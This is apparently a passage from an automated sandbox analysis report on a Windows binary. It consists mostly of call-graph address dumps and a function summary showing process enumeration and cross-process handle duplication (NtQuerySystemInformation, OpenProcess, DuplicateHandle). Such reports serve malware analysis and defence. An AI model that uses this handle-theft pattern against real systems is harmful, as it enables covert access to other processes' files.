39243->39362 39363 438460 39244->39363 39246 409240 39246->39152 39247 4251c4 39246->39247 39375 424f07 39247->39375 39249 4251e4 39250 4251f7 39249->39250 39251 4251e8 39249->39251 39383 4250f8 39250->39383 39382 4446ea 11 API calls 39251->39382 39253 4251f2 39253->39157 39255 425209 39257 425249 39255->39257 39261 4250f8 126 API calls 39255->39261 39262 425287 39255->39262 39391 4384e9 134 API calls 39255->39391 39392 424f74 123 API calls 39255->39392 39257->39262 39393 424ff0 13 API calls 39257->39393 39261->39255 39265->39162 39269->39152 39270->39185 39271->39188 39272->39161 39274 443da3 39273->39274 39292 443db6 39273->39292 39396 41707a 11 API calls 39274->39396 39276 443da8 39277 443dac 39276->39277 39279 443dbc 39276->39279 39397 4446ea 11 API calls 39277->39397 39398 4300e8 memset memset memcpy 39279->39398 39283 443dce 39292->39167 39293->39174 39295 4438d0 39294->39295 39307 4438c9 39294->39307 39296 415378 memcpy memcpy 39295->39296 39297 4438d5 39296->39297 39298 4154e2 10 API calls 39297->39298 39299 443906 39297->39299 39297->39307 39298->39299 39300 443970 memset 39299->39300 39299->39307 39302 44398b 39300->39302 39301 415700 10 API calls 39304 4439c0 39301->39304 39303 41975c 10 API calls 39302->39303 39305 4439a0 39302->39305 39303->39305 39306 418981 10 API calls 39304->39306 39304->39307 39305->39301 39305->39307 39306->39307 39307->39200 39309 415a77 39308->39309 39310 415a8d 39309->39310 39311 415a7e memset 39309->39311 39310->39203 39311->39310 39313 4438b5 11 API calls 39312->39313 39314 41525d 39313->39314 39314->39209 39316 444328 39315->39316 39317 444423 39316->39317 39318 44434e 39316->39318 39319 4446ea 11 API calls 39317->39319 39320 432d4e memset memset memcpy 39318->39320 39326 444381 39319->39326 39321 44435a 39320->39321 39323 444375 39321->39323 39328 44438b 39321->39328 39322 432d4e memset memset memcpy 39324 4443ec 39322->39324 39325 416935 16 API calls 39323->39325 39324->39326 39327 416935 16 API calls 39324->39327 39325->39326 39326->39215 39327->39326 39328->39322 39330 432d58 39329->39330 39332 432d65 39329->39332 39331 432cc4 memset memset memcpy 39330->39331 39331->39332 39332->39223 39350 41698e 39349->39350 39351 41693e 39349->39351 39350->39243 39352 41694c 39351->39352 39353 422fd1 memset 39351->39353 39352->39350 39354 4165a0 11 API calls 39352->39354 39353->39352 39355 416972 39354->39355 39355->39350 39356 422b84 15 API calls 39355->39356 39356->39350 39362->39204 39364 41703f 11 API calls 39363->39364 39365 43847a 39364->39365 39366 43848a 39365->39366 39367 43847e 39365->39367 39369 438270 133 API calls 39366->39369 39368 4446ea 11 API calls 39367->39368 39371 438488 39368->39371 39370 4384aa 39369->39370 39370->39371 39372 424f26 122 API calls 39370->39372 39371->39246 39373 4384bb 39372->39373 39374 438270 133 API calls 39373->39374 39374->39371 39376 424f1f 39375->39376 39377 424f0c 39375->39377 39379 424eea 11 API calls 39376->39379 39378 416760 11 API calls 39377->39378 39380 424f18 39378->39380 39381 424f24 39379->39381 39380->39249 39381->39249 39382->39253 39384 425108 39383->39384 39390 42510d 39383->39390 39385 424f74 123 API calls 39384->39385 39385->39390 39386 42569b 124 API calls 39387 42516e 39386->39387 39389 415c7d 16 API calls 39387->39389 39388 425115 39388->39255 39389->39388 39390->39386 39390->39388 39391->39255 39392->39255 39396->39276 39397->39292 39398->39283 39429 413f4f 39402->39429 39405 413f37 K32GetModuleFileNameExW 39406 413f4a 39405->39406 39406->38527 39408 41396c wcschr 39407->39408 39410 413969 wcscpy 39407->39410 39408->39410 39411 41398e 39408->39411 39412 413a3a 39410->39412 39434 4097f7 wcslen wcslen _memicmp 39411->39434 39412->38527 39414 41399a 39415 4139a4 memset 39414->39415 39416 4139e6 39414->39416 39435 409dd5 GetWindowsDirectoryW wcscpy 39415->39435 39418 413a31 wcscpy 39416->39418 39419 4139ec memset 39416->39419 39418->39412 39436 409dd5 GetWindowsDirectoryW wcscpy 39419->39436 39420 4139c9 wcscpy wcscat 39420->39412 39422 413a11 memcpy wcscat 39422->39412 39424 413cb0 GetModuleHandleW 39423->39424 39425 413cda 39423->39425 39424->39425 39426 413cbf GetProcAddress 39424->39426 39427 413ce3 GetProcessTimes 39425->39427 39428 413cf6 39425->39428 39426->39425 39427->38529 39428->38529 39430 413f2f 39429->39430 39431 413f54 39429->39431 39430->39405 39430->39406 39432 40a804 8 API calls 39431->39432 39433 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39432->39433 39433->39430 39434->39414 39435->39420 39436->39422 39437->38550 39438->38572 39440 409cf9 GetVersionExW 39439->39440 39441 409d0a 39439->39441 39440->39441 39441->38579 39441->38582 39442->38586 39443->38588 39444->38654 39446 40bba5 39445->39446 39493 40cc26 39446->39493 39449 40bd4b 39514 40cc0c 39449->39514 39454 40b2cc 27 API calls 39455 40bbef 39454->39455 39521 40ccf0 _wcsicmp 39455->39521 39457 40bbf5 39457->39449 39522 40ccb4 6 API calls 39457->39522 39459 40bc26 39460 40cf04 17 API calls 39459->39460 39461 40bc2e 39460->39461 39462 40bd43 39461->39462 39463 40b2cc 27 API calls 39461->39463 39464 40cc0c 4 API calls 39462->39464 39465 40bc40 39463->39465 39464->39449 39523 40ccf0 _wcsicmp 39465->39523 39467 40bc46 39467->39462 39468 40bc61 memset memset WideCharToMultiByte 39467->39468 39524 40103c strlen 39468->39524 39470 40bcc0 39471 40b273 27 API calls 39470->39471 39472 40bcd0 memcmp 39471->39472 39472->39462 39473 40bce2 39472->39473 39474 404423 37 API calls 39473->39474 39475 40bd10 39474->39475 39475->39462 39476 40bd3a LocalFree 39475->39476 39477 40bd1f memcpy 39475->39477 39476->39462 39477->39476 39478->38669 39480 409a74 GetTempFileNameW 39479->39480 39481 409a66 GetWindowsDirectoryW 39479->39481 39480->38667 39481->39480 39482->38704 39483->38704 39484->38704 39485->38704 39486->38704 39487->38704 39488->38704 39489->38704 39490->38704 39491->38679 39492->38701 39525 4096c3 CreateFileW 39493->39525 39495 40cc34 39496 40cc3d GetFileSize 39495->39496 39497 40bbca 39495->39497 39498 40afcf 2 API calls 39496->39498 39497->39449 39505 40cf04 39497->39505 39499 40cc64 39498->39499 39526 40a2ef ReadFile 39499->39526 39501 40cc71 39527 40ab4a MultiByteToWideChar 39501->39527 39503 40cc95 CloseHandle 39504 40b04b ??3@YAXPAX 39503->39504 39504->39497 39506 40b633 free 39505->39506 39507 40cf14 39506->39507 39533 40b1ab free free 39507->39533 39509 40bbdd 39509->39449 39509->39454 39510 40cf1b 39510->39509 39512 40cfef 39510->39512 39534 40cd4b 39510->39534 39513 40cd4b 14 API calls 39512->39513 39513->39509 39515 40b633 free 39514->39515 39516 40cc15 39515->39516 39517 40aa04 free 39516->39517 39518 40cc1d 39517->39518 39583 40b1ab free free 39518->39583 39520 40b7d4 memset CreateFileW 39520->38661 39520->38662 39521->39457 39522->39459 39523->39467 39524->39470 39525->39495 39526->39501 39528 40ab93 39527->39528 39529 40ab6b 39527->39529 39528->39503 39530 40a9ce 4 API calls 39529->39530 39531 40ab74 39530->39531 39532 40ab7c MultiByteToWideChar 39531->39532 39532->39528 39533->39510 39535 40cd7b 39534->39535 39568 40aa29 39535->39568 39537 40cef5 39538 40aa04 free 39537->39538 39539 40cefd 39538->39539 39539->39510 39541 40aa29 6 API calls 39542 40ce1d 39541->39542 39543 40aa29 6 API calls 39542->39543 39544 40ce3e 39543->39544 39545 40ce6a 39544->39545 39576 40abb7 wcslen memmove 39544->39576 39546 40ce9f 39545->39546 39579 40abb7 wcslen memmove 39545->39579 39549 40a8d0 7 API calls 39546->39549 39552 40ceb5 39549->39552 39550 40ce56 39577 40aa71 wcslen 39550->39577 39551 40ce8b 39580 40aa71 wcslen 39551->39580 39558 40a8d0 7 API calls 39552->39558 39555 40ce5e 39578 40abb7 wcslen memmove 39555->39578 39556 40ce93 39581 40abb7 wcslen memmove 39556->39581 39560 40cecb 39558->39560 39582 40d00b malloc memcpy free free 39560->39582 39562 40cedd 39563 40aa04 free 39562->39563 39564 40cee5 39563->39564 39565 40aa04 free 39564->39565 39566 40ceed 39565->39566 39567 40aa04 free 39566->39567 39567->39537 39569 40aa33 39568->39569 39575 40aa63 39568->39575 39570 40aa44 39569->39570 39571 40aa38 wcslen 39569->39571 39572 40a9ce malloc memcpy free free 39570->39572 39571->39570 39573 40aa4d 39572->39573 39574 40aa51 memcpy 39573->39574 39573->39575 39574->39575 39575->39537 39575->39541 39576->39550 39577->39555 39578->39545 39579->39551 39580->39556 39581->39546 39582->39562 39583->39520 39584->38719 39585->38727 39586 44dea5 39587 44deb5 FreeLibrary 39586->39587 39588 44dec3 39586->39588 39587->39588 39589 4147f3 39592 414561 39589->39592 39591 414813 39593 41456d 39592->39593 39594 41457f GetPrivateProfileIntW 39592->39594 39597 4143f1 memset _itow WritePrivateProfileStringW 39593->39597 39594->39591 39596 41457a 39596->39591 39597->39596 39598 4287c1 39599 4287d2 39598->39599 39600 429ac1 39598->39600 39601 428818 39599->39601 39602 42881f 39599->39602 39623 425711 39599->39623 39612 425ad6 39600->39612 39668 415c56 11 API calls 39600->39668 39635 42013a 39601->39635 39663 420244 96 API calls 39602->39663 39607 4260dd 39662 424251 119 API calls 39607->39662 39608 4259da 39661 416760 11 API calls 39608->39661 39613 429a4d 39616 429a66 39613->39616 39620 429a9b 39613->39620 39664 415c56 11 API calls 39616->39664 39617 422aeb memset memcpy memcpy 39617->39623 39621 429a96 39620->39621 39666 416760 11 API calls 39620->39666 39667 424251 119 API calls 39621->39667 39622 4260a1 39660 415c56 11 API calls 39622->39660 39623->39600 39623->39608 39623->39613 39623->39617 39623->39622 39631 4259c2 39623->39631 39634 425a38 39623->39634 39651 4227f0 memset memcpy 39623->39651 39652 422b84 15 API calls 39623->39652 39653 422b5d memset memcpy memcpy 39623->39653 39654 422640 13 API calls 39623->39654 39656 4241fc 11 API calls 39623->39656 39657 42413a 89 API calls 39623->39657 39624 429a7a 39665 416760 11 API calls 39624->39665 39631->39612 39655 415c56 11 API calls 39631->39655 39634->39631 39658 422640 13 API calls 39634->39658 39659 4226e0 12 API calls 39634->39659 39636 42014c 39635->39636 39639 420151 39635->39639 39678 41e466 96 API calls 39636->39678 39638 420162 39638->39623 39639->39638 39640 4201b3 39639->39640 39641 420229 39639->39641 39642 4201b8 39640->39642 39643 4201dc 39640->39643 39641->39638 39644 41fd5e 85 API calls 39641->39644 39669 41fbdb 39642->39669 39643->39638 39648 4201ff 39643->39648 39675 41fc4c 39643->39675 39644->39638 39648->39638 39650 42013a 96 API calls 39648->39650 39650->39638 39651->39623 39652->39623 39653->39623 39654->39623 39655->39608 39656->39623 39657->39623 39658->39634 39659->39634 39660->39608 39661->39607 39662->39612 39663->39623 39664->39624 39665->39621 39666->39621 39667->39600 39668->39608 39670 41fbf8 39669->39670 39673 41fbf1 39669->39673 39683 41ee26 39670->39683 39674 41fc39 39673->39674 39693 4446ce 11 API calls 39673->39693 39674->39638 39679 41fd5e 39674->39679 39676 41ee6b 85 API calls 39675->39676 39677 41fc5d 39676->39677 39677->39643 39678->39639 39681 41fd65 39679->39681 39680 41fdab 39680->39638 39681->39680 39682 41fbdb 85 API calls 39681->39682 39682->39681 39684 41ee41 39683->39684 39685 41ee32 39683->39685 39694 41edad 39684->39694 39697 4446ce 11 API calls 39685->39697 39688 41ee3c 39688->39673 39691 41ee58 39691->39688 39699 41ee6b 39691->39699 39693->39674 39703 41be52 39694->39703 39697->39688 39698 41eb85 11 API calls 39698->39691 39700 41ee70 39699->39700 39701 41ee78 39699->39701 39756 41bf99 85 API calls 39700->39756 39701->39688 39704 41be6f 39703->39704 39705 41be5f 39703->39705 39711 41be8c 39704->39711 39735 418c63 memset memset 39704->39735 39734 4446ce 11 API calls 39705->39734 39707 41be69 39707->39688 39707->39698 39709 41bee7 39709->39707 39739 41a453 85 API calls 39709->39739 39711->39707 39711->39709 39712 41bf3a 39711->39712 39713 41bed1 39711->39713 39738 4446ce 11 API calls 39712->39738 39715 41bef0 39713->39715 39718 41bee2 39713->39718 39715->39709 39716 41bf01 39715->39716 39717 41bf24 memset 39716->39717 39720 41bf14 39716->39720 39736 418a6d memset memcpy memset 39716->39736 39717->39707 39724 41ac13 39718->39724 39737 41a223 memset memcpy memset 39720->39737 39723 41bf20 39723->39717 39725 41ac52 39724->39725 39726 41ac3f memset 39724->39726 39729 41ac6a 39725->39729 39740 41dc14 19 API calls 39725->39740 39727 41acd9 39726->39727 39727->39709 39731 41aca1 39729->39731 39741 41519d 39729->39741 39731->39727 39732 41acc0 memset 39731->39732 39733 41accd memcpy 39731->39733 39732->39727 39733->39727 39734->39707 39735->39711 39736->39720 39737->39723 39738->39709 39740->39729 39744 4175ed 39741->39744 39752 417570 SetFilePointer 39744->39752 39747 41760a ReadFile 39748 417637 39747->39748 39749 417627 GetLastError 39747->39749 39750 4151b3 39748->39750 39751 41763e memset 39748->39751 39749->39750 39750->39731 39751->39750 39753 4175b2 39752->39753 39754 41759c GetLastError 39752->39754 39753->39747 39753->39750 39754->39753 39755 4175a8 GetLastError 39754->39755 39755->39753 39756->39701 39757 417bc5 39759 417c61 39757->39759 39763 417bda 39757->39763 39758 417bf6 UnmapViewOfFile CloseHandle 39758->39758 39758->39763 39761 417c2c 39761->39763 39769 41851e 18 API calls 39761->39769 39763->39758 39763->39759 39763->39761 39764 4175b7 39763->39764 39765 4175d6 CloseHandle 39764->39765 39766 4175c8 39765->39766 39767 4175df 39765->39767 39766->39767 39768 4175ce Sleep 39766->39768 39767->39763 39768->39765 39769->39761 39770 415304 free 39771 4152c6 malloc 39772 4152e2 39771->39772 39773 4152ef 39771->39773 39775 416760 11 API calls 39773->39775 39775->39772 39776 4148b6 FindResourceW 39777 4148cf SizeofResource 39776->39777 39780 4148f9 39776->39780 39778 4148e0 LoadResource 39777->39778 39777->39780 39779 4148ee LockResource 39778->39779 39778->39780 39779->39780 39781 441b3f 39791 43a9f6 39781->39791 39783 441b61 39964 4386af memset 39783->39964 39785 44189a 39786 442bd4 39785->39786 39788 4418e2 39785->39788 39787 4418ea 39786->39787 39966 441409 memset 39786->39966 39788->39787 39965 4414a9 12 API calls 39788->39965 39792 43aa20 39791->39792 39793 43aadf 39791->39793 39792->39793 39794 43aa34 memset 39792->39794 39793->39783 39795 43aa56 39794->39795 39796 43aa4d 39794->39796 39967 43a6e7 39795->39967 39975 42c02e memset 39796->39975 39801 43aad3 39977 4169a7 11 API calls 39801->39977 39802 43aaae 39802->39793 39802->39801 39817 43aae5 39802->39817 39803 43ac18 39806 43ac47 39803->39806 39979 42bbd5 memcpy memcpy memcpy memset memcpy 39803->39979 39807 43aca8 39806->39807 39980 438eed 16 API calls 39806->39980 39811 43acd5 39807->39811 39982 4233ae 11 API calls 39807->39982 39810 43ac87 39981 4233c5 16 API calls 39810->39981 39983 423426 11 API calls 39811->39983 39815 43ace1 39984 439811 162 API calls 39815->39984 39816 43a9f6 160 API calls 39816->39817 39817->39793 39817->39803 39817->39816 39978 439bbb 22 API calls 39817->39978 39819 43acfd 39824 43ad2c 39819->39824 39985 438eed 16 API calls 39819->39985 39821 43ad19 39986 4233c5 16 API calls 39821->39986 39823 43ad58 39987 44081d 162 API calls 39823->39987 39824->39823 39827 43add9 39824->39827 39991 423426 11 API calls 39827->39991 39828 43ae3a memset 39829 43ae73 39828->39829 39992 42e1c0 146 API calls 39829->39992 39830 43adab 39989 438c4e 162 API calls 39830->39989 39831 43ad6c 39831->39793 39831->39830 39988 42370b memset memcpy memset 39831->39988 39835 43adcc 39990 440f84 12 API calls 39835->39990 39836 43ae96 39993 42e1c0 146 API calls 39836->39993 39839 43aea8 39840 43aec1 39839->39840 39994 42e199 146 API calls 39839->39994 39841 43af00 39840->39841 39995 42e1c0 146 API calls 39840->39995 39841->39793 39845 43af1a 39841->39845 39846 43b3d9 39841->39846 39996 438eed 16 API calls 39845->39996 39852 43b4c8 39846->39852 39853 43b3f6 39846->39853 39847 43b60f 39847->39793 40055 4393a5 17 API calls 39847->40055 39850 43af2f 39997 4233c5 16 API calls 39850->39997 39856 43b4f2 39852->39856 40043 42bbd5 memcpy memcpy memcpy memset memcpy 39852->40043 40037 432878 12 API calls 39853->40037 39854 43af51 39998 423426 11 API calls 39854->39998 40044 43a76c 21 API calls 39856->40044 39858 43af7d 39999 423426 11 API calls 39858->39999 39862 43b529 40045 44081d 162 API calls 39862->40045 39863 43b462 40039 423330 11 API calls 39863->40039 39864 43af94 40000 423330 11 API calls 39864->40000 39868 43afca 40001 423330 11 API calls 39868->40001 39869 43b47e 39873 43b497 39869->39873 40040 42374a memcpy memset memcpy memcpy memcpy 39869->40040 39870 43b544 39874 43b55c 39870->39874 40046 42c02e memset 39870->40046 39871 43b428 39871->39863 40038 432b60 16 API calls 39871->40038 40041 4233ae 11 API calls 39873->40041 40047 43a87a 162 API calls 39874->40047 39876 43afdb 40002 4233ae 11 API calls 39876->40002 39881 43b56c 39885 43b58a 39881->39885 40048 423330 11 API calls 39881->40048 39882 43b4b1 40042 423399 11 API calls 39882->40042 39884 43afee 40003 44081d 162 API calls 39884->40003 40049 440f84 12 API calls 39885->40049 39886 43b4c1 40051 42db80 162 API calls 39886->40051 39891 43b592 40050 43a82f 16 API calls 39891->40050 39894 43b5b4 40052 438c4e 162 API calls 39894->40052 39896 43b5cf 40053 42c02e memset 39896->40053 39898 43b005 39898->39793 39902 43b01f 39898->39902 40004 42d836 162 API calls 39898->40004 39899 43b1ef 40014 4233c5 16 API calls 39899->40014 39902->39899 40012 423330 11 API calls 39902->40012 40013 42d71d 162 API calls 39902->40013 39903 43b212 40015 423330 11 API calls 39903->40015 39905 43b087 40005 4233ae 11 API calls 39905->40005 39906 43add4 39906->39847 40054 438f86 16 API calls 39906->40054 39909 43b22a 40016 42ccb5 11 API calls 39909->40016 39912 43b23f 40017 4233ae 11 API calls 39912->40017 39913 43b10f 40008 423330 11 API calls 39913->40008 39915 43b257 40018 4233ae 11 API calls 39915->40018 39919 43b129 40009 4233ae 11 API calls 39919->40009 39920 43b26e 40019 4233ae 11 API calls 39920->40019 39923 43b09a 39923->39913 40006 42cc15 19 API calls 39923->40006 40007 4233ae 11 API calls 39923->40007 39924 43b282 40020 43a87a 162 API calls 39924->40020 39926 43b13c 40010 440f84 12 API calls 39926->40010 39928 43b29d 40021 423330 11 API calls 39928->40021 39931 43b15f 40011 4233ae 11 API calls 39931->40011 39932 43b2af 39933 43b2b8 39932->39933 39934 43b2ce 39932->39934 40022 4233ae 11 API calls 39933->40022 40023 440f84 12 API calls 39934->40023 39938 43b2c9 40025 4233ae 11 API calls 39938->40025 39939 43b2da 40024 42370b memset memcpy memset 39939->40024 39942 43b2f9 40026 423330 11 API calls 39942->40026 39944 43b30b 40027 423330 11 API calls 39944->40027 39946 43b325 40028 423399 11 API calls 39946->40028 39948 43b332 40029 4233ae 11 API calls 39948->40029 39950 43b354 40030 423399 11 API calls 39950->40030 39952 43b364 40031 43a82f 16 API calls 39952->40031 39954 43b370 40032 42db80 162 API calls 39954->40032 39956 43b380 40033 438c4e 162 API calls 39956->40033 39958 43b39e 40034 423399 11 API calls 39958->40034 39960 43b3ae 40035 43a76c 21 API calls 39960->40035 39962 43b3c3 40036 423399 11 API calls 39962->40036 39964->39785 39965->39787 39966->39786 39968 43a6f5 39967->39968 39974 43a765 39967->39974 39968->39974 40056 42a115 39968->40056 39972 43a73d 39973 42a115 146 API calls 39972->39973 39972->39974 39973->39974 39974->39793 39976 4397fd memset 39974->39976 39975->39795 39976->39802 39977->39793 39978->39817 39979->39806 39980->39810 39981->39807 39982->39811 39983->39815 39984->39819 39985->39821 39986->39824 39987->39831 39988->39830 39989->39835 39990->39906 39991->39828 39992->39836 39993->39839 39994->39840 39995->39840 39996->39850 39997->39854 39998->39858 39999->39864 40000->39868 40001->39876 40002->39884 40003->39898 40004->39905 40005->39923 40006->39923 40007->39923 40008->39919 40009->39926 40010->39931 40011->39902 40012->39902 40013->39902 40014->39903 40015->39909 40016->39912 40017->39915 40018->39920 40019->39924 40020->39928 40021->39932 40022->39938 40023->39939 40024->39938 40025->39942 40026->39944 40027->39946 40028->39948 40029->39950 40030->39952 40031->39954 40032->39956 40033->39958 40034->39960 40035->39962 40036->39906 40037->39871 40038->39863 40039->39869 40040->39873 40041->39882 40042->39886 40043->39856 40044->39862 40045->39870 40046->39874 40047->39881 40048->39885 40049->39891 40050->39886 40051->39894 40052->39896 40053->39906 40054->39847 40055->39793 40057 42a175 40056->40057 40059 42a122 40056->40059 40057->39974 40062 42b13b 146 API calls 40057->40062 40059->40057 40060 42a115 146 API calls 40059->40060 40063 43a174 40059->40063 40087 42a0a8 146 API calls 40059->40087 40060->40059 40062->39972 40075 43a196 40063->40075 40078 43a19e 40063->40078 40064 43a306 40064->40075 40107 4388c4 14 API calls 40064->40107 40067 42a115 146 API calls 40067->40078 40069 43a642 40069->40075 40111 4169a7 11 API calls 40069->40111 40073 43a635 40110 42c02e memset 40073->40110 40075->40059 40078->40064 40078->40067 40078->40075 40088 42ff8c 40078->40088 40096 415a91 40078->40096 40100 4165ff 40078->40100 40103 439504 13 API calls 40078->40103 40104 4312d0 146 API calls 40078->40104 40105 42be4c memcpy memcpy memcpy memset memcpy 40078->40105 40106 43a121 11 API calls 40078->40106 40080 43a325 40080->40069 40080->40073 40080->40075 40081 4169a7 11 API calls 40080->40081 40082 42b5b5 memset memcpy 40080->40082 40083 42bf4c 14 API calls 40080->40083 40085 4165ff 11 API calls 40080->40085 40108 42b63e 14 API calls 40080->40108 40109 42bfcf memcpy 40080->40109 40081->40080 40082->40080 40083->40080 40085->40080 40087->40059 40112 43817e 40088->40112 40090 42ff9d 40090->40078 40091 42ff99 40091->40090 40092 42ffe3 40091->40092 40093 42ffd0 40091->40093 40117 4169a7 11 API calls 40092->40117 40116 4169a7 11 API calls 40093->40116 40097 415a9d 40096->40097 40098 415ab3 40097->40098 40099 415aa4 memset 40097->40099 40098->40078 40099->40098 40268 4165a0 40100->40268 40103->40078 40104->40078 40105->40078 40106->40078 40107->40080 40108->40080 40109->40080 40110->40069 40111->40075 40113 438187 40112->40113 40114 438192 40112->40114 40118 4380f6 40113->40118 40114->40091 40116->40090 40117->40090 40120 43811f 40118->40120 40119 438164 40119->40114 40120->40119 40123 437e5e 40120->40123 40146 4300e8 memset memset memcpy 40120->40146 40147 437d3c 40123->40147 40125 437eb3 40125->40120 40126 437ea9 40126->40125 40132 437f22 40126->40132 40162 41f432 40126->40162 40129 437f06 40209 415c56 11 API calls 40129->40209 40130 437f7f 40133 437f95 40130->40133 40135 43802b 40130->40135 40132->40130 40134 432d4e 3 API calls 40132->40134 40210 415c56 11 API calls 40133->40210 40134->40130 40137 4165ff 11 API calls 40135->40137 40138 438054 40137->40138 40173 437371 40138->40173 40141 43806b 40142 438094 40141->40142 40211 42f50e 137 API calls 40141->40211 40144 437fa3 40142->40144 40212 4300e8 memset memset memcpy 40142->40212 40144->40125 40213 41f638 103 API calls 40144->40213 40146->40120 40148 437d69 40147->40148 40151 437d80 40147->40151 40214 437ccb 11 API calls 40148->40214 40150 437d76 40150->40126 40151->40150 40152 437da3 40151->40152 40153 437d90 40151->40153 40155 438460 133 API calls 40152->40155 40153->40150 40218 437ccb 11 API calls 40153->40218 40158 437dcb 40155->40158 40156 437de8 40217 424f26 122 API calls 40156->40217 40158->40156 40215 444283 13 API calls 40158->40215 40160 437dfc 40216 437ccb 11 API calls 40160->40216 40163 41f54d 40162->40163 40169 41f44f 40162->40169 40164 41f466 40163->40164 40248 41c635 memset memset 40163->40248 40164->40129 40164->40132 40169->40164 40171 41f50b 40169->40171 40219 41f1a5 40169->40219 40244 41c06f memcmp 40169->40244 40245 41f3b1 89 API calls 40169->40245 40246 41f398 85 API calls 40169->40246 40171->40163 40171->40164 40247 41c295 85 API calls 40171->40247 40249 41703f 40173->40249 40175 437399 40176 43739d 40175->40176 40179 4373ac 40175->40179 40256 4446ea 11 API calls 40176->40256 40178 4373a7 40178->40141 40180 416935 16 API calls 40179->40180 40181 4373ca 40180->40181 40183 438460 133 API calls 40181->40183 40187 4251c4 136 API calls 40181->40187 40191 415a91 memset 40181->40191 40194 43758f 40181->40194 40203 437584 40181->40203 40208 437d3c 134 API calls 40181->40208 40257 425433 13 API calls 40181->40257 40258 425413 17 API calls 40181->40258 40259 42533e 16 API calls 40181->40259 40260 42538f 16 API calls 40181->40260 40261 42453e 122 API calls 40181->40261 40182 4375bc 40264 415c7d 16 API calls 40182->40264 40183->40181 40186 4375d2 40186->40178 40265 4442e6 11 API calls 40186->40265 40187->40181 40189 4375e2 40189->40178 40266 444283 13 API calls 40189->40266 40191->40181 40262 42453e 122 API calls 40194->40262 40195 4375f4 40200 437620 40195->40200 40201 43760b 40195->40201 40199 43759f 40202 416935 16 API calls 40199->40202 40205 416935 16 API calls 40200->40205 40267 444283 13 API calls 40201->40267 40202->40203 40203->40182 40263 42453e 122 API calls 40203->40263 40205->40178 40207 437612 memcpy 40207->40178 40208->40181 40209->40125 40210->40144 40211->40142 40212->40144 40213->40125 40214->40150 40215->40160 40216->40156 40217->40150 40218->40150 40220 41bc3b 100 API calls 40219->40220 40221 41f1b4 40220->40221 40222 41edad 85 API calls 40221->40222 40229 41f282 40221->40229 40223 41f1cb 40222->40223 40224 41f1f5 memcmp 40223->40224 40225 41f20e 40223->40225 40223->40229 40224->40225 40226 41f21b memcmp 40225->40226 40225->40229 40227 41f326 40226->40227 40230 41f23d 40226->40230 40228 41ee6b 85 API calls 40227->40228 40227->40229 40228->40229 40229->40169 40230->40227 40231 41f28e memcmp 40230->40231 40233 41c8df 55 API calls 40230->40233 40231->40227 40232 41f2a9 40231->40232 40232->40227 40235 41f308 40232->40235 40236 41f2d8 40232->40236 40234 41f269 40233->40234 40234->40227 40237 41f287 40234->40237 40238 41f27a 40234->40238 40235->40227 40242 4446ce 11 API calls 40235->40242 40239 41ee6b 85 API calls 40236->40239 40237->40231 40241 41ee6b 85 API calls 40238->40241 40240 41f2e0 40239->40240 40243 41b1ca memset 40240->40243 40241->40229 40242->40227 40243->40229 40244->40169 40245->40169 40246->40169 40247->40163 40248->40164 40250 417044 40249->40250 40251 41705c 40249->40251 40253 416760 11 API calls 40250->40253 40255 417055 40250->40255 40252 417075 40251->40252 40254 41707a 11 API calls 40251->40254 40252->40175 40253->40255 40254->40250 40255->40175 40256->40178 40257->40181 40258->40181 40259->40181 40260->40181 40261->40181 40262->40199 40263->40182 40264->40186 40265->40189 40266->40195 40267->40207 40273 415cfe 40268->40273 40277 415d23 __aullrem __aulldvrm 40273->40277 40280 41628e 40273->40280 40274 4163ca 40287 416422 11 API calls 40274->40287 40276 416172 memset 40276->40277 40277->40274 40277->40276 40278 416422 10 API calls 40277->40278 40279 415cb9 10 API calls 40277->40279 40277->40280 40278->40277 40279->40277 40281 416520 40280->40281 40282 416527 40281->40282 40286 416574 40281->40286 40284 416544 40282->40284 40282->40286 40288 4156aa 11 API calls 40282->40288 40285 416561 memcpy 40284->40285 40284->40286 40285->40286 40286->40078 40287->40280 40288->40284 40289 441819 40292 430737 40289->40292 40291 441825 40293 430756 40292->40293 40294 43076d 40292->40294 40295 430774 40293->40295 40296 43075f 40293->40296 40294->40291 40307 43034a memcpy 40295->40307 40306 4169a7 11 API calls 40296->40306 40299 4307ce 40300 430819 memset 40299->40300 40308 415b2c 11 API calls 40299->40308 40300->40294 40302 4307e9 40302->40294 40302->40300 40303 43077e 40303->40294 40303->40299 40304 4307fa 40303->40304 40309 4169a7 11 API calls 40304->40309 40306->40294 40307->40303 40308->40302 40309->40294 40310 41493c EnumResourceNamesW

                                                                                                        Executed Functions

                                                                                                        Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 354->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 372 40dff8-40dffb 370->372 373 40defd-40df02 370->373 371->370 374 40ded0-40dee1 _wcsicmp 371->374 372->363 375 40dffd-40e006 372->375 376 40df08 373->376 377 40dfef-40dff2 CloseHandle 373->377 374->370 374->375 375->362 375->363 378 40df0b-40df10 376->378 377->372 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0040DDAD
                                                                                                          • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
